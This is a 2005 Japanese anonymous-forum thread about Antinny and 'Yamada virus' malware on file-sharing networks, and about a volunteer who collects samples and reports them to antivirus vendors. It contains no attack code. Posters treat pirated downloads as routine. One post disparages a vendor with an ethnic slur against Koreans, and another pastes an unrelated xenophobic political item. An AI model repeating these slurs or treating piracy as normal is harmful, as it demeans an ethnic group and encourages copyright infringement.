309[名無し]さん(bin+cue).rar:2005/05/18(水) 00:07:41 ID:XzcI9Y6q0
ダウソ板(つーか全部だが)はIP録ってるし、
nyがらみは、ケーサツさんも興味深く観察してるだろうからねぇ。
危ないものを放流したって書けば、即、タイーホの可能性はあるし、ウイルス開発も同じだね。

ここは、善意で流れてるものを拾って解析してるってだけなので、趣味の範疇だな。
こんなとこ見てないで、スパマー撲滅してほしいもんだなぁ…
310ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
311282:2005/05/18(水) 03:31:18 ID:I60+FPMn0
すいません、キヤノンが無茶言うんですよ。集めてこいみたいな。そんなことできねぇよ。感染したら怖いよ。
あのCD-R送ってもらえたらありがたいじゃないか、でも会社としてはできないよな
ということで、単なるユーザーのお願いです。

メールで会社の人に「このスレで頼み込んでこい」って無茶言ってみましたが、
やっぱり無茶だったようです。本家のEsetならやってくれそうだけど、英語よく分からん。

NOD32は分かっている限り 山田(A)には対応 B BTには対応してませんが、
なんかもう色々ありすぎてよく分かりません。
312[名無し]さん(bin+cue).rar:2005/05/18(水) 03:46:56 ID:iDOvww4M0
何だ、結局他人を利用する事しか考えていない厨坊のたわごとだったわけか
313[名無し]さん(bin+cue).rar:2005/05/18(水) 03:49:38 ID:U53WXBZ40
>>311
何かったるい事抜かしてんだよ
このスレ+過去スレ見りゃ通報屋が地道にやってきたのが判るだろ。
自分でやりな。
もしくは黙ってても集まってくるように信用されるように努力しろ
あれか、キャノンの下請けか派遣のプか?
座ったまんまで何かを得ようなんざ十年早い。
まず手を動かせ
314[名無し]さん(bin+cue).rar:2005/05/18(水) 03:50:44 ID:yYruv05N0
>>311
本当に中の人なら終わってるなこの会社
315通報屋 ◆Y39/vakKjY :2005/05/18(水) 03:53:32 ID:9N/GakzD0
>>311
3スレくらい前からハッシュ拾いまくってこい。
開かなきゃ感染なんてしない。
てかキャノンが言うなら専用マシン用意してもらえ。
俺がやる筋合いはない。
こっちだって手間掛けて送ってたりしてるんだから。

#実費+それ相応の謝礼なら多少は考えるかもね。
以上、偽善者の戯言でした
316314:2005/05/18(水) 03:57:28 ID:yYruv05N0
なんかわけわからない事書いてたな俺
会社の人ごめんなさい
317[名無し]さん(bin+cue).rar:2005/05/18(水) 09:08:48 ID:VTTN7CfZ0
282が着払いなりの負担をして通報屋からCD-Rを受け取り、
それをNOD32ユーザーとしてキャノンに送ってくれるって形なら
スレにもキャノンにも歓迎されたかもしれないのにな。
318[名無し]さん(bin+cue).rar:2005/05/18(水) 10:16:06 ID:dbEPVkQL0
自分では何もできず、いつもママンにやってもらっているのだろう。
319[名無し]さん(bin+cue).rar:2005/05/18(水) 10:17:19 ID:bqBdu1O/0
>>311
あんた派遣だな。
安い給料で無茶言われて大変だねえ。

ウイルスほしけりゃshareのジャンプを片っ端からダウソしろ。
320[名無し]さん(bin+cue).rar:2005/05/18(水) 10:21:36 ID:OcsW0R5O0
>>315
献体提出量でポイントが負荷されてソフトの購入代金減額とか
使用期限が延びたらおもろいね。どっかやってくれないかな
321[名無し]さん(bin+cue).rar:2005/05/18(水) 10:44:18 ID:2PgxGpRV0
>>320
作って送る香具師とか出てきそうだからどこもやらないんじゃない?
322[名無し]さん(bin+cue).rar:2005/05/18(水) 10:52:24 ID:OcsW0R5O0
>>321
そだねw
323321:2005/05/18(水) 11:19:16 ID:2PgxGpRV0
>>322
と思ったけど、ウィルス作るリスクに比べてリターンが小さいから
誰もやらないような気がしてきた。
324通報屋 ◆Y39/vakKjY :2005/05/18(水) 14:26:40 ID:9N/GakzD0
運営と被るが一覧落としておく
------TrendMicro 山田ウイルス対応状況-----
TROJ_MELLPON.A、TROJ_MELLPON.B、TROJ_MELLPON.D、TROJ_MELLPON.E
TROJ_MELLPON.F、TROJ_MELLPON.H、TROJ_MELLPON.I、TROJ_MELLPON.J
TROJ_MELLPON.L、TROJ_MELLPON.N、TROJ_DROPPER.BT
------ここまで対応一覧-----
325[名無し]さん(bin+cue).rar:2005/05/18(水) 17:11:04 ID:kuPMDt+w0
>>274
紹介するならドネーションぐらい送ろうな。
漏れは50euro送ったが、paypalで任意の額送れる。

#お前らが使っているのか昨日から混んでる希ガス


>>279
AhnLabは自称「アジア産の新型ウイルスへの対応スピードは業界トップクラス」(ww
ttp://www.ahnlab.co.jp/product/v3virusblock2005IS.asp
antynny詰め合わせで試したら最低クラス
ヒソヒソ( ゚o゚)ヤダァ(゚o゚ )ネェ、キイタ?( ゚o゚)オクサン(゚o゚ )ツーホヤサンミカタニツケナイカラ?
326[名無し]さん(bin+cue).rar:2005/05/18(水) 20:55:27 ID:otvQbz+Z0
>>325
AhnLabのは、作りこみ的にはよくできてるけど、なにせ半島ものなので
ちょっち信頼できないってところだね。まぁ、未対応の多さに関しては
自分たちこそアジアの中心だと言ってる方々が作ってるので、そんな
もんなんでそ。特にニュイルス関係はダメだよね。
327[名無し]さん(bin+cue).rar:2005/05/18(水) 22:26:42 ID:8FYvKJ4E0
世界に広げよう山田ウィルスの輪


('A`)
328[名無し]さん(bin+cue).rar:2005/05/18(水) 22:56:09 ID:z62PaK+N0
(´・ω・`)
329[名無し]さん(bin+cue).rar:2005/05/18(水) 23:06:29 ID:CgqbhaY60
眼段などマカフィー未対応の国産ウイルス報告してみた。
制限3MBだけど日本Mcafeeのメール直送ならすぐ解析して1〜2日で返事くれるみたい。
ブラウザからアップするwebimm何とかは反応遅い。

                                                 でもアホらしなった。どうせ俺は踏まないから1円の得にもならん。もうやらね。
330[名無し]さん(bin+cue).rar:2005/05/18(水) 23:11:22 ID:+o2IN0Dz0
2chで対策されたら、新規感染者の面白SSみれないじゃん
なんでウィルス作者はもっとたくさんの掲示板に爆撃することにしなかったの?
331[名無し]さん(bin+cue).rar:2005/05/18(水) 23:55:29 ID:z0afMsxh0
>>330
祭りがしたかったんだろ。
そうでなければ、ワーム形態にしてAntinyもどきにしてるはず。
332[名無し]さん(bin+cue).rar:2005/05/19(木) 00:57:05 ID:383Csbig0
(一般コミック) [矢沢あい] NANA -ナナ- 第13巻.zipf0ba5300f1778e34894e856c30898bb1339acea2
これのなか12巻空白exeでW32.HLLW.Antinny.G
特典壁紙空白.exeTrojan.Sientok だった
333[名無し]さん(bin+cue).rar:2005/05/19(木) 00:59:16 ID:383Csbig0
Shareで
334[名無し]さん(bin+cue).rar:2005/05/19(木) 01:29:45 ID:YLjdLCFG0
そいえば、しばらく前にあったrubyだらけのエルフェンリート
昨日NAVにかけたらちゃんと反応してた
名前が"trojan horse"ってまんまやん。固有名詞は付かないのか?
335[名無し]さん(bin+cue).rar:2005/05/19(木) 02:40:26 ID:QIwHEHQt0
識別名trojan horseってのは、とりあえず付けておく名前だとおもた。
被害報告が増えてきたら内部解析して特徴調べて正式名付けるんでそ。

336[名無し]さん(bin+cue).rar:2005/05/19(木) 03:01:42 ID:YLjdLCFG0
ああ、なるほどです。
確かに、被害報告のほとんど無い物にまで名前付けてたらきりがないですしね
337[名無し]さん(bin+cue).rar:2005/05/19(木) 12:23:35 ID:KPg/VPvr0
>>296
通報屋さん
あつめた検体はどこのベンダーに送ってます?

>>282 さんをみるとNODには送っていないようですが・・・
たいへんかと思いますが、いろんなところに送っていただければ
みんなが助かります。
338[名無し]さん(bin+cue).rar:2005/05/19(木) 12:35:33 ID:jjL0R18/0
>>337
自分でやれば?
通報屋もこのスレでもらったり拾ったりしているから、
それを手に入れて自分の好きなところに送ればいい。
339[名無し]さん(bin+cue).rar:2005/05/19(木) 12:47:20 ID:kClJTMLV0
>>167も書いてるが、なるべくパスかけてアプロダに
うpするようにすればいいんじゃないか?
そうすれば通報したい人は通報するだろうし。
340通報屋 ◆Y39/vakKjY :2005/05/19(木) 12:51:13 ID:PCTYGqEY0
>>337
(´・ω・`)っttp://blog.livedoor.jp/antiny_virus/
個人的スタンスが書いてあるス。
もうばれてるんでこっちでも晒すス。
341[名無し]さん(bin+cue).rar:2005/05/19(木) 13:06:24 ID:RrcFH3e90
いやっつーか、こんなん一時のもんだろ?
山田自体そのうち廃れて通報屋とかいうのも用済みだろうし。
寧ろ面白そうなのは構って君の存在意義である山田ウィルスが廃れてから。
どうやって自分を必死にアピっていくのか、ある意味見物。
ブログ作って気を引こうとしたみたいだが、次は何やんのかねw
ニュイルスoffでも開くのかね
342[名無し]さん(bin+cue).rar:2005/05/19(木) 13:29:05 ID:hcxuNyCC0
>>341
アフォは引っ込んでろ。な!
343[名無し]さん(bin+cue).rar:2005/05/19(木) 13:36:50 ID:RrcFH3e90
>342
尻尾振る相手間違ってるってw

つーかexe素で踏む人間なんて厨房ばっかだろうに。VM入れてないなんてネタだろ。
新作目当てでここ見てるんだから通報屋とかブログ作ったんなら永遠に引き篭もってて欲しいよ、ホント。
344[名無し]さん(bin+cue).rar:2005/05/19(木) 13:39:36 ID:ZpgGyY1p0
>>343
こんな香具師が感染するんだよなぁ・・・
(´・ω・)カワイソス
345[名無し]さん(bin+cue).rar:2005/05/19(木) 13:46:20 ID:RrcFH3e90
山田は4.5回踏んだよ、VMで。
恐らくVMも知らんで取り合えず煽ってみたんだろうな。
ここでの情報のみでexe必死に踏んでいくお前の方が(´・ω・)カワイソス
346[名無し]さん(bin+cue).rar:2005/05/19(木) 13:57:27 ID:GKki/SYl0
(´-`).。oO(いちいち仮想マシンで踏まんと分からんのねw)
347[名無し]さん(bin+cue).rar:2005/05/19(木) 14:00:58 ID:QIwHEHQt0
いいじゃねーかよ、通報屋氏は好きでやってるんだから煽るなヨ。

VM環境なんて簡単に突破できるんだよ。もちろん知ってて書いてるんだよな>RrcFH3e90
山田なんて屁みたいなもんだというのは同意するが。

ほんとに怖いニュイルスは、踏んでも(表向きには)何も悪さをしないってヤツだな。
348[名無し]さん(bin+cue).rar:2005/05/19(木) 14:28:26 ID:++1ToYU10
>>VM環境なんて簡単に突破できるんだよ。

ここんとこ詳しく。
いや、純粋に興味あるから。

ホストOS側のドライブとかネットワークとか共有してない、ほぼ完全
にスタンドアロンな仮想マシンでも、簡単に突破されるの?
349227:2005/05/19(木) 14:30:16 ID:L+qebEhG0
>>253
遅レスですいません
教えていただきありがとうございました。
350[名無し]さん(bin+cue).rar:2005/05/19(木) 14:32:33 ID:UKbkZLcX0
VMになんかホゥルがあったらどうにもならんな
351[名無し]さん(bin+cue).rar:2005/05/19(木) 14:33:29 ID:RrcFH3e90
いや、ひどいインターネット並に頭悪い発言だよ。
IPから住所わかるとか言ってるレベルだから放置しとけ。

怖いウィルスってのはソフトウェアの製作者が意図的に組み込んだそれがしとかだな。
352[名無し]さん(bin+cue).rar:2005/05/19(木) 14:44:55 ID:sKVgKyyf0
つーか、いい加減したり顔で出張ってくんなってw
お前さんが嫌いな通報屋より、よっぽど自己主張激しくてワロス
353[名無し]さん(bin+cue).rar:2005/05/19(木) 14:51:40 ID:RrcFH3e90
ん、お前みたいにID変えてくりゃいいのか?w
悔しかったら俺のVM環境を簡単に突破してくれたまえよ。
ひどいインターネット君。
354[名無し]さん(bin+cue).rar:2005/05/19(木) 14:58:38 ID:ZpgGyY1p0
命名: V M 房
355[名無し]さん(bin+cue).rar:2005/05/19(木) 15:07:06 ID:cxlayVE30
人の振り見て我が振り直せ

とはよくいったものだ
356[名無し]さん(bin+cue).rar:2005/05/19(木) 15:20:08 ID:QIwHEHQt0
いや、煽り屋はどうでもいいんだが、VM(たとえばVMware)にしろguestでWindows走らせるなら、
スタンドアロンだろーが、事実上何でもできるようになってるAPIをコールするんだからね
IPから住所が分かるといった頭の悪い発言はしないが、おまいら知らないこと多すぎ

わざわざVMで踏まなきゃ理解できないようなの釣っても仕方ないな
357[名無し]さん(bin+cue).rar:2005/05/19(木) 15:26:10 ID:sKVgKyyf0
というかVMに脆弱性がなかったら、何度も.verうpしてへん罠
有益なのは認めるが、これさえ使ってりゃ無問題的な姿勢が房丸出し

>356
おまいら言うなw
358[名無し]さん(bin+cue).rar:2005/05/19(木) 15:26:23 ID:r3/Kq8IU0
>356
アホだろお前。
359[名無し]さん(bin+cue).rar:2005/05/19(木) 15:27:52 ID:r3/Kq8IU0
まぁVMについて論じるのは構わんが、通報屋はうぜーっつーことでいいのか?
360[名無し]さん(bin+cue).rar:2005/05/19(木) 15:28:12 ID:XXl8PLqG0
あれだろな、ブルーバックで落ちたように見せかけるだけで、
VM厨は簡単にny
361[名無し]さん(bin+cue).rar:2005/05/19(木) 15:29:43 ID:2kAKGnU60
>>359
IP変えてくるなよ(w、VM厨が。
362[名無し]さん(bin+cue).rar:2005/05/19(木) 15:39:02 ID:r3/Kq8IU0
(w なんて今更使う奴居たんだな。しかしなんで認定厨は単発IDが多いのやら。
・・・まぁ俺もVMware使ってるんだけどさ。
363361:2005/05/19(木) 15:49:08 ID:PUArOora0
ID変えてきてやったぞ(w
364[名無し]さん(bin+cue).rar:2005/05/19(木) 16:10:36 ID:8ymskCJY0
山田・・・おそろしくギラつくのぉ
365[名無し]さん(bin+cue).rar:2005/05/19(木) 16:16:59 ID:Dn66SsVP0
>363
どうせなら、明日の自作PCの投票でしろよ
366[名無し]さん(bin+cue).rar:2005/05/19(木) 17:05:50 ID:4J9eaez00
アフォなヤシが沸いてるインターネッツですね
367[名無し]さん(bin+cue).rar:2005/05/19(木) 18:30:02 ID:4iUwq+Og0
IDつーかリモホ変えるぐらいで、何をうれしそうに(ありがちだが、sage忘れてるぞ)
3秒もあれば単発IDなら、いくらでも変えれるだろ。
回線1本で、いくつかのIDを使いまわすぐらいしてから煽りやがれ。
368[名無し]さん(bin+cue).rar:2005/05/19(木) 18:33:21 ID:4J9eaez00
>>367
ここはVIPじゃない
ダウソの単発IDは素でそれだけの人数がいるんだ
369[名無し]さん(bin+cue).rar:2005/05/19(木) 18:35:20 ID:4J9eaez00
>>367
なんか勘違いしてたすまん
370[名無し]さん(bin+cue).rar:2005/05/19(木) 18:37:04 ID:4iUwq+Og0
>>368
俺は
371[名無し]さん(bin+cue).rar:2005/05/19(木) 18:37:23 ID:Aw7PoGfX0
>>368
もしかして
372[名無し]さん(bin+cue).rar:2005/05/19(木) 18:37:59 ID:CvM1khlX0
>>368
釣られてるのか?
373[名無し]さん(bin+cue).rar:2005/05/19(木) 18:41:23 ID:CvM1khlX0
で変えてみて
374[名無し]さん(bin+cue).rar:2005/05/19(木) 18:42:11 ID:CvM1khlX0
いや、変わってなかったか、
375[名無し]さん(bin+cue).rar:2005/05/19(木) 18:44:43 ID:uK/N25hg0
ほな、IDを戻してミソ
376[名無し]さん(bin+cue).rar:2005/05/19(木) 18:54:24 ID:UXQF6nn/0
いらんことすな
377[名無し]さん(bin+cue).rar:2005/05/19(木) 18:56:23 ID:TA+fV+S40
仮想HUBが死んでた…orz
378[名無し]さん(bin+cue).rar:2005/05/19(木) 18:57:25 ID:WNLidYXu0

煽ってるヤツも、遊んでるヤツも、もうやみれ.....
379[名無し]さん(bin+cue).rar:2005/05/19(木) 18:58:09 ID:cxlayVE30
おれは1人だぞ。たぶん切れてないから変わってないはず。
380[名無し]さん(bin+cue).rar:2005/05/19(木) 18:58:09 ID:uK/N25hg0
>>378
(´・ω・) スマソン
381[名無し]さん(bin+cue).rar:2005/05/19(木) 19:11:37 ID:sKVgKyyf0
やっぱ新作出ないと駄スレ化する罠
382[名無し]さん(bin+cue).rar:2005/05/19(木) 19:16:12 ID:cxlayVE30
いいんだよそれで。ここはもともとネタスレじゃないし。
383[名無し]さん(bin+cue).rar:2005/05/19(木) 19:30:00 ID:xgKfLaQN0
山田系は全部通報屋のブログに誘導しようや。
ここでやられてもウザいだけだし。
384[名無し]さん(bin+cue).rar:2005/05/19(木) 19:36:19 ID:4Uf6nfIE0
門戸は広く開けておくべきだと思うがな。
385[名無し]さん(bin+cue).rar:2005/05/19(木) 20:03:23 ID:Uzd4zqZhO
何もしない低能の嫉妬ですか
386[名無し]さん(bin+cue).rar:2005/05/19(木) 20:21:43 ID:lFXaArxJ0
何もできない低能のファビョーンだろ。
387[名無し]さん(bin+cue).rar:2005/05/20(金) 04:29:48 ID:3q+sfL0H0
通報屋がバスターにありがたられるケースが一つ思いついた。

山田が世間で話題の中心になる。
バスター「うちは山田の亜種すでに○種類対応しています。対応の鈍い某社とは違います!」
バスター大人気。シェア奪回

こうなれば通報屋はバスターにとって神















多分そうならない(´・ω・) カワイソス
388[名無し]さん(bin+cue).rar:2005/05/20(金) 07:48:53 ID:MFK6XZVx0
改行厨は氏ね
389[名無し]さん(bin+cue).rar:2005/05/20(金) 08:10:14 ID:Lczgztrw0
通報屋は存在が(´・ω・) カワイソス
390[名無し]さん(bin+cue).rar:2005/05/20(金) 09:06:48 ID:w/KYZ0AUO
VMでチェツクするのは手っ取り早いし安全だからじゃないかな
復旧楽だし

まあ通報屋氏はボランティアだからね
俺は尊敬してるよ
391[名無し]さん(bin+cue).rar:2005/05/20(金) 11:03:44 ID:QpKlRoEl0
まあ文句だけ垂れてるやつよりは、ずっと貢献してる罠。>通報屋氏
無理しない程度にがんがってほしい。
392[名無し]さん(bin+cue).rar:2005/05/20(金) 11:17:49 ID:X97559Kj0
ああ、確かに頑張ってるね。ただ文句垂れてる奴とは違うしね。
あ、頑張ってるのは通報屋氏ね。
393[名無し]さん(bin+cue).rar:2005/05/20(金) 11:19:14 ID:Lczgztrw0
通報屋氏ね

warata
394:2005/05/20(金) 11:21:48 ID:bCPWYuMQ0
395[名無し]さん(bin+cue).rar:2005/05/20(金) 12:18:54 ID:AsxCu5Ce0
>391
禿同。通報屋氏ねは氏ね
396[名無し]さん(bin+cue).rar:2005/05/20(金) 13:27:55 ID:RErUTptL0
亜種も登場、まだまだ2ちゃんねるを荒らし続ける「山田ウイルス」のその後
http://www.itmedia.co.jp/enterprise/articles/0505/20/news036.html

小林氏の降臨、キボンヌ
397[名無し]さん(bin+cue).rar:2005/05/20(金) 13:56:50 ID:nlSZcUHb0
★「日本のパチンコ産業が北朝鮮を支えている」…金正日会談議事録

・フジテレビは20日、ニュース番組「スーパータイム」の中で、朝鮮民主主義
 人民共和国(北朝鮮)の金正日総書記との会談議事録を元に、金総書記が
 「在日朝鮮人の70%が、30兆円市場である日本のパチンコ産業に関わっており、
 その送金がわが国を支えている」という旨の発言を行ったと報じた。


い い か ら パチンコ屋  潰 せ よ 23
http://society3.2ch.net/test/read.cgi/korea/1116020140/l50
398[名無し]さん(bin+cue).rar:2005/05/20(金) 15:45:08 ID:8H1w6HGM0
ヲチスレでなんか検体ほしいとのことなのでVMで片っ端から探すか。
399[名無し]さん(bin+cue).rar:2005/05/20(金) 16:01:41 ID:7ioTQzOz0
通報屋氏の許可貰って代理マルチすまんこ
ttp://blog.livedoor.jp/antiny_virus/archives/22517698.html
山田ウィルス簡易チェッカーを作ってくれたス>通報屋氏
XP SP2,W2kSP4+フルパッチで検証済み。
誰か9x環境で試して欲しいス
400[名無し]さん(bin+cue).rar:2005/05/20(金) 16:35:32 ID:MGfExcyL0
>>396
だよなぁ。小林もスレに還元しろよな。勝手に商売ネタにするんじゃねーよ。
ライターの風上にも置けない香具師だな。ったく。これだから軟銀行はよぉ。
401[名無し]さん(bin+cue).rar:2005/05/20(金) 17:15:16 ID:XZDJSxs00
>>通報屋氏
AVGに送るよりclamavに送ったほうが対応が早いかも。英語でないと辛いでつが
ここなら毎日更新かかってるのでスルーされることはないと思う (´・ω・)ス
402[名無し]さん(bin+cue).rar:2005/05/20(金) 17:20:56 ID:QpKlRoEl0
更新頻度の多さなら、BitDefenderもいい線いってると思う。
403[名無し]さん(bin+cue).rar:2005/05/20(金) 17:26:55 ID:RErUTptL0
>>通報屋氏
小林氏から連絡あった?
404[名無し]さん(bin+cue).rar:2005/05/20(金) 17:28:34 ID:XZDJSxs00
>>402
確かにBitDefenderの方が(´・ω・)イイスネ
405通報屋 ◆Y39/vakKjY :2005/05/20(金) 17:41:52 ID:VfW9sBM60
暑くて起きたス。
>>403
連絡無しの無断掲載ス・・・(´・ω・)
>>401,402,404 氏(並列扱いスマソ)
ありがとう。BitDefenderとかそういうところに送ってみるス(´・ω・)Excite翻訳で通じるかな
406[名無し]さん(bin+cue).rar:2005/05/20(金) 17:47:02 ID:kVxVZH6P0
>Excite翻訳で通じるかな
十中八九通じない。
407[名無し]さん(bin+cue).rar:2005/05/20(金) 18:31:25 ID:FFOoX4rf0
WEB翻訳のコツは、なるべく簡単な文章にする。
英訳したら確認の為もう一度日本語に戻してみる。
そんで文意がおかしくなってたら、最初の日本語を考え直す。
つーかさあ、virusって書いて送るだけで無問題なんだが・・・
408[名無し]さん(bin+cue).rar:2005/05/20(金) 18:33:12 ID:RErUTptL0
>>405
ここに降臨する事を条件に許してやれw
409[名無し]さん(bin+cue).rar:2005/05/20(金) 18:40:23 ID:hY4E0Imp0
410[名無し]さん(bin+cue).rar:2005/05/20(金) 20:42:13 ID:20GyF70V0
>>409
すごいな通報屋
一気に有名人
411[名無し]さん(bin+cue).rar:2005/05/20(金) 20:46:49 ID:BXN52OLg0
通報屋も一ダウン民
412[名無し]さん(bin+cue).rar:2005/05/20(金) 20:52:14 ID:pIkHYePv0
通報屋
413通報屋 ◆Y39/vakKjY :2005/05/20(金) 21:17:16 ID:VfW9sBM60
>>409 等のITMediaの記事ですが、
名前削除依頼してきました。
そこまで努力したわけでもないので・・・
本当にお礼がしたいのはハッシュ張って下さった人とか検体送ってくれた人、
それにこのスレ住人さんとかです。
414[名無し]さん(bin+cue).rar:2005/05/20(金) 21:20:36 ID:FPtXi22D0
有志に代わってた
415[名無し]さん(bin+cue).rar:2005/05/20(金) 21:25:30 ID:ue519FNs0
( ゚д゚) 仕事早ッ
416通報屋 ◆Y39/vakKjY :2005/05/20(金) 21:26:18 ID:VfW9sBM60
( ゚д゚) 仕事早・・・
417[名無し]さん(bin+cue).rar:2005/05/20(金) 21:41:18 ID:d9896YC+0
通報屋もびっくり
418[名無し]さん(bin+cue).rar:2005/05/20(金) 21:50:32 ID:qyiBmRWN0
ワロタ
419[名無し]さん(bin+cue).rar:2005/05/20(金) 21:51:24 ID:MGfExcyL0
小林ぃぃぃ! 人の名前(ハンドル)は勝手に使っておいて
お前はだんまりかよぉ。 3分で対応できるってことは
普段、ここに張り付いてるくせにぃ…。

まぁ、広く知らしめることはいいんだが、やり方の問題つーことね。

420通報屋 ◆Y39/vakKjY :2005/05/20(金) 21:57:23 ID:VfW9sBM60
>>419
もちけつ。対応したのは別の人だった。
メールが来て、配慮足らなかった。スマソっていう感じの文書書いてあった。
421[名無し]さん(bin+cue).rar:2005/05/20(金) 22:01:46 ID:f09Kvw5B0
>>413
記事のすぐ左に個人情報保護のカテゴリがあるのにワラタ
422[名無し]さん(bin+cue).rar:2005/05/20(金) 22:29:14 ID:0TvQ3Q4P0
通報屋のHN出すくらいべつに問題ないんじゃね?
423[名無し]さん(bin+cue).rar:2005/05/20(金) 22:35:15 ID:lfL+4gao0
悪意が無いとはいえ、限りなくグレーゾーンな場所の個をピックアップする行為は
まずいような希ガス

なんだかんだいってダウソ板って悪印象しかないしなw
424[名無し]さん(bin+cue).rar:2005/05/20(金) 22:43:32 ID:0TvQ3Q4P0
いや2ちゃんねるとブログ上のHNであって実在の個人名じゃないし…
当然だが本人がインターネット上に公開してるHNだし…
クレーム付けられたITmediaも苦笑いって所だと思うよ。
425[名無し]さん(bin+cue).rar:2005/05/20(金) 23:04:53 ID:ue519FNs0
HNでも他人の名前を無断で自分の記事に載せるのはどうかと思う。

たまたま通報屋氏は活動歴が短いからそうでもなかったろうが、
例えばこれがFOX★あたりだったらまたアンチが大騒ぎしたろう。

特に何でも叩き煽りの対象になる2chのコテを記事に書いたら
そのコテに不利益なことになる可能性も充分にあるべ。

まぁ今回は掲載→通報屋から削除依頼→迅速に対応という流れが
スムーズに行ったんだからこの話はおしまいでいいんでないの。
426[名無し]さん(bin+cue).rar:2005/05/20(金) 23:16:00 ID:f09Kvw5B0
参照量増えるだろうし通報屋さんはブログの横に
ウイルス対策ソフトのアフェリエイトでも張っておくべし
427[名無し]さん(bin+cue).rar:2005/05/20(金) 23:53:33 ID:o0RXb3Bs0
三三三三三三三  (     | ITメディアライター!
三三三三三     ))    |
三三三三)ミ,((^^彡ミ彡  /    きさまッ!
三三三三 ((三三  6)彡//\
三三三∩三ミl三三  /ミ彡 /) |  見ているなッ!
三三三|彡ミ三l三 / \ / /、 |
三三三ヽ_)二 | ̄ ノ / ミl :l、\
三 /二 /ミ ‐v-― ´/ )ミ/ / /ヽ ̄ ̄ ̄ ̄
三/  ̄ /ミ   lミ   (_/ 三`´`´`´
428[名無し]さん(bin+cue).rar:2005/05/21(土) 02:41:15 ID:yE9PGhRM0
OSの再インストールしました。
でもいまだにアイコンをメモ帳に偽装したexeファイルが
残ってます。
どうすればよかとですか?
ちなみに再インストールはフォーマットしました。
429[名無し]さん(bin+cue).rar:2005/05/21(土) 03:38:59 ID:fePQ1HTS0
友達になればいいんじゃないかな
430[名無し]さん(bin+cue).rar:2005/05/21(土) 04:46:10 ID:93OpNRu90
>>428
意味が分からん フォーマットかけたら
前のファイル全部無くなるつーの
431[名無し]さん(bin+cue).rar:2005/05/21(土) 06:19:47 ID:NsmBfVoW0
フォーマットせずに上書きしたんじゃないの?
432[名無し]さん(bin+cue).rar:2005/05/21(土) 07:46:12 ID:1exRVmq40
つーかカワイソススレでやれよ。
通報屋が幼女.jpg                     .exeを踏んじゃう様な人間の神なのは判ったから。
態々こっちまで話題広げる意味が判らんが・・・。
433[名無し]さん(bin+cue).rar:2005/05/21(土) 07:53:43 ID:1exRVmq40
何かどうみても煽りに見えるな・・・、すまん。
相応しいスレあるんだからそっちでやったら良いんじゃね、って意味だ。
別にそれ以外の意図は無い。
434[名無し]さん(bin+cue).rar:2005/05/21(土) 08:09:01 ID:qTYD9Ttx0
>>433
おもいっきり煽りに見えるw
435[名無し]さん(bin+cue).rar:2005/05/21(土) 08:17:28 ID:XPP/2smf0
>>通報屋
乙。記事では通報屋に敬意を示すために載せたんだと思うよ。
検体が見つかりにくく、また、一部の検体のサイズがでかいという中で
検体提出に貢献した人ということで。
でも本人が望まないなら速やかに削除した方がいいけどね。
436[名無し]さん(bin+cue).rar:2005/05/21(土) 08:43:24 ID:3uSnXbGi0
まあ今日初めてこのスレを見た漏れが言うのもなんだが結局は通報屋氏=ネ申ということだな
437[名無し]さん(bin+cue).rar:2005/05/21(土) 08:51:05 ID:1exRVmq40
別に通報屋を貶すつもりは無いんだがね・・・。
ボランティアなのに頑張ってるし、すげーと思うよ。

でもスレ違いってテンプレにも書いてあるのに誘導しないのは、単純に疑問なんだが。
438[名無し]さん(bin+cue).rar:2005/05/21(土) 11:04:42 ID:FYOGnEoz0
間違って検索まだの.exe開いてしまって
案の定ウイルスはいってたけど
バスターのおかげで助かった。
439[名無し]さん(bin+cue).rar:2005/05/21(土) 12:23:24 ID:AeCu0XyO0
>>438
(;^ิД^ิ)今の会話のタイミングだねぇ・・・100パー嘘と分かる・・・

修正してやったぞ。

間違って検索まだのウイルス.exe開いてしまっても
バスターのおかげで助かることがある。
440[名無し]さん(bin+cue).rar:2005/05/21(土) 14:18:18 ID:WB+g2caAO
(DVDISO)【音楽PV】玉置成実 Greeting DVD(2004.5.19).zip
antinny.GとPE_PeriteAが入っているとバスター感知。
後者はウイルス駆除済み(安全です)
前者は隔離できません→(ファイルごと)隔離済み
これで一応大丈夫?
exe四つも入ってた。ちなみに実行前
441[名無し]さん(bin+cue).rar:2005/05/21(土) 15:33:23 ID:hn62foD+0
>>440
南無
442[名無し]さん(bin+cue).rar:2005/05/21(土) 16:56:01 ID:OPOfHoai0
間違ってexe実行しちゃったんですけど、いろいろしたり探してるんですが
どんなウィルスか分からないです。
で、終了しようとしたら、 mellpox ってプログラムを強制終了に
なるんですが、これって何か知りませんか?誰かお助けorz
443[名無し]さん(bin+cue).rar:2005/05/21(土) 17:09:35 ID:PmXtLBzw0
>>442
山田・・・
444[名無し]さん(bin+cue).rar:2005/05/21(土) 17:10:38 ID:lEo9zhph0
山田はウィルスじゃない
445[名無し]さん(bin+cue).rar:2005/05/21(土) 17:25:42 ID:phuJuuBW0
>>442
このスレの最初のあたりを見れば分かるかと
http://tmp5.2ch.net/test/read.cgi/download/1116660656/
446ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
447[名無し]さん(bin+cue).rar:2005/05/21(土) 20:32:28 ID:YmxKMFcJ0
なんか新種作者の発表会会場になってないか?
448[名無し]さん(bin+cue).rar:2005/05/21(土) 20:48:11 ID:gxz29/D00
>>446補足だけど
VirusTotalとOnline malware scanで、いくつか検知できました。
ひとつのexeに複数のマルウェアが入ってるのかな?
449通報屋 ◆Y39/vakKjY :2005/05/21(土) 21:18:39 ID:f/YhJ4LQ0
>>446
検体、送ってありました・・・。
現在他社と連絡を取っております。暫くお待ち下さい_| ̄|○
450[名無し]さん(bin+cue).rar:2005/05/21(土) 21:22:14 ID:GZTBH9K50
>>449
通報屋はNOD32は使ってないの?
451[名無し]さん(bin+cue).rar:2005/05/21(土) 21:32:27 ID:sV41TR+w0
>>450
それを聞いてどうするの?
452446:2005/05/21(土) 21:33:37 ID:gxz29/D00
>>通報屋氏
ありがとうございます。
毎度の通報、おつかれさまであります。
453[名無し]さん(bin+cue).rar:2005/05/21(土) 21:53:42 ID:GZTBH9K50
>>451
どうもしないよ
454[名無し]さん(bin+cue).rar:2005/05/21(土) 22:27:24 ID:KViFvrMS0
"PCウイルス感染:個人情報流出か? 福島・そうま農協"
http://www.mainichi-msn.co.jp/today/news/20050522k0000m040079000c.html

>「ウィニー」を使用
